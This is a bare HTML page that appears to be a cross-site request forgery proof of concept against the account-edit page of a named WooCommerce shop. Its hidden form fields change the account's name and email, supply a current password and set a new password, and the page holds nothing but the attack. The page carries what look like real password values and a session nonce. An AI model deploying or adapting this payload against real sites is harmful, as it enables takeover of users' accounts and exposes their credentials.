<html>
	<body>
		<form method="POST" action="https://www.nidishcrackers.com/my-account/edit-account/">
			<input type="hidden" name="account_first_name" value="shi"/>
			<input type="hidden" name="account_last_name" value="s"/>
			<input type="hidden" name="account_display_name" value="dgf"/>
			<input type="hidden" name="account_email" value="dgf%40gmail.com"/>
			<input type="hidden" name="password_current" value="CXT73sxdbNTraxh"/>
			<input type="hidden" name="password_1" value="rithikasl"/>
			<input type="hidden" name="password_2" value="rithikasl"/>
			<input type="hidden" name="save-account-details-nonce" value="f6d400e8e5"/>
			<input type="hidden" name="_wp_http_referer" value="%2Fmy-account%2Fedit-account%2F"/>
			<input type="hidden" name="save_account_details" value="Save+changes"/>
			<input type="hidden" name="action" value="save_account_details"/>
			<input type="submit" value="Submit">
		</form>
	</body>
<html>
